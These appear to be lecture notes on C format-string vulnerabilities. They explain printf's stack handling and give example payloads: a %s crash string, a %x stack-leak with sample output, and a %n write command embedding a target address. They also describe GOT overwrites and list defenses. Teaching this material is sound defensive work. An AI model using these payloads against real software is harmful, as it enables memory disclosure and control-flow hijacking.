Format-String Vulnerabilities
Buffer overflows get all the press, but format-string bugs are just as dangerous and far sneakier. A single misplaced printf(user_input) — instead of the safe printf("%s", user_input) — hands an attacker a general-purpose read/write primitive over the entire process address space. Real-world exploits have used this class of bug to leak stack canaries and ASLR bases, overwrite GOT entries, and gain shells.
Background: how printf works internally
printf is a variadic function: int printf(const char *format, ...). The ... means it accepts any number of additional arguments. Internally, it walks the format string character by character. Whenever it sees a % followed by a conversion specifier (d, s, x, n, …), it calls va_arg() to fetch the next value from the caller's stack and formats it.
The critical diagram from the slides shows the 32-bit stack layout when printf("ID: %d, Name: %s, Age: %d\n", id, name, age) is called:
| Stack slot (higher → lower) | Contents |
|---|---|
age |
3rd optional argument |
name (pointer) |
2nd optional argument |
id |
1st optional argument |
| address of format string | the format parameter |
| return address of printf | (printf's own frame below) |
va_arg() simply increments the va_list pointer upward by the size of the expected type. It has no way to know when it has run out of real arguments. If the format string contains more specifiers than arguments provided, va_arg() just keeps reading whatever is on the stack above the format string pointer — data belonging to the caller's frame.
The vulnerability: user input as the format string
The bug is passing attacker-controlled data as the first argument:
// VULNERABLE
printf(user_input); // user_input IS the format string
// SAFE
printf("%s", user_input); // user_input is just a string to print
The same problem arises when user data is spliced into a format string before printing:
// Also vulnerable: user_input ends up embedded in the format string
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
When user_input contains format specifiers like %x or %n, printf treats them as real conversion directives and acts on stack memory the attacker never supplied as an argument.
Attack 1 — Crash the program
Send a string full of %s specifiers: %s%s%s%s%s%s%s%s%s. For each %s, printf pops a value off the stack and treats it as a pointer to a string. Most of those values are not valid addresses; when printf tries to dereference one, the program crashes with a segmentation fault. This is the simplest denial-of-service.
Attack 2 — Read arbitrary stack memory
%x (or %p) prints the next stack word as a hex integer without dereferencing it. Chain them to walk up the stack:
$ ./vul
Please enter a string: %x.%x.%x.%x.%x.%x.%x.%x
63.b7fc5ac0.b7eb8309.bffff33f.11223344.252e7825.78252e78.2e78252e
The bold 11223344 in the lecture output is the local variable var = 0x11223344 from the caller's frame — leaked without touching it. The number of %x tokens needed equals the number of 4-byte stack words between the va_list starting position and the target value. Finding it is trial and error (or GDB inspection).
%s goes further: it treats the stack word as a pointer and prints the null-terminated string at that address. This leaks arbitrary memory — not just stack values. A carefully chosen pointer can dump a password buffer, a stack canary, or a libc code pointer (defeating ASLR).
Why this matters for bypassing mitigations: leaking a stack canary lets you bypass stack canary protection; leaking a code pointer (e.g., a printf@GOT entry) reveals the libc base and defeats ASLR — both are standard first steps in modern exploit chains.
Attack 3 — Write to arbitrary memory with %n
%n is the dangerous one. It writes an integer — the number of characters printed so far — into the memory address pointed to by the next va_list value:
int i;
printf("hello%n", &i); // after this, i == 5
To exploit this, the attacker must get the target address onto the stack (e.g., by embedding it at the start of the input buffer, which is part of fmtstr()'s frame):
$ echo $(printf "\x04\xf3\xff\xbf").%x.%x.%x.%x.%x.%n > input
Breaking this down:
\x04\xf3\xff\xbf— the address ofvar(little-endian:0xbffff304), placed at the start ofinputso it sits in the stack frame.%x.%x.%x.%x.%x— five%xspecifiers to advanceva_listuntil it points at that address%n— writes the character count printed so far into*0xbffff304, i.e. intovar
The value written equals the total number of characters printed before %n. You can control it precisely using field-width padding: %100x prints the integer using at least 100 characters, so combining padding with %n lets you write any small integer you choose.
Targeting the GOT
The Global Offset Table (GOT) holds run-time addresses of shared-library functions. If you overwrite the GOT entry for exit (or any function called after your payload) with the address of system() or your shellcode, the next call to that function redirects to your target. Because the GOT is at a fixed, known address (without ASLR, or after leaking it), it is the classic %n target for control-flow hijacking via format strings.
Format specifier quick reference
| Specifier | Action | Attack use |
|---|---|---|
%x / %p |
Print next stack word as hex | Leak stack contents |
%s |
Dereference stack word as char * |
Leak arbitrary memory |
%n |
Write character count to pointed address | Arbitrary memory write |
%k$x |
Direct parameter access — skip to the k-th argument | Target a specific stack slot precisely |
%Nx |
Print with field width N (pads output) | Control the value written by %n |
Direct parameter access (%k$x syntax) lets you skip straight to the k-th argument without burning multiple %x tokens. For example, %5$x reads the 5th argument directly. Combined with %5$n, you can write to the address held in the 5th stack slot in a single, compact payload.
Defenses
| Defense | How it helps |
|---|---|
Always use printf("%s", user_input) |
User data is never parsed as a format string |
Compiler -Wformat-security / -Wformat=2 |
Warns (or errors) when a non-literal format string is passed to printf-family functions |
FORTIFY_SOURCE |
Replaces printf internals with bounds-checked versions that detect missing arguments |
| Full RELRO | Makes the GOT read-only at load time, blocking %n-based GOT overwrites |
| ASLR + PIE | Forces attackers to leak addresses before writing — raises the bar but does not eliminate the bug |
The most important defense is the simplest: never pass user-controlled data as the format argument. All other defenses are mitigations that reduce exploitability after the bug is introduced.
Key takeaways
- A format-string vulnerability exists whenever attacker-controlled data reaches the format-string position of
printf,sprintf,fprintf, or related functions. %x/%pleaks stack words as integers;%sdereferences a stack word as a pointer and prints memory at that address.%nwrites the character-count-so-far to a pointed-to address — turning the bug into an arbitrary write primitive.- Field-width padding (e.g.
%100x) and direct parameter access (%k$n) give precise control over the value written and the target slot. - Common exploit targets include stack secrets (canaries), code pointers (to defeat ASLR), and GOT entries (to redirect function calls for control-flow hijacking).
- The fix is one line: use
printf("%s", user_input), neverprintf(user_input). Compiler flags-Wformat-securityandFORTIFY_SOURCEcatch the pattern automatically.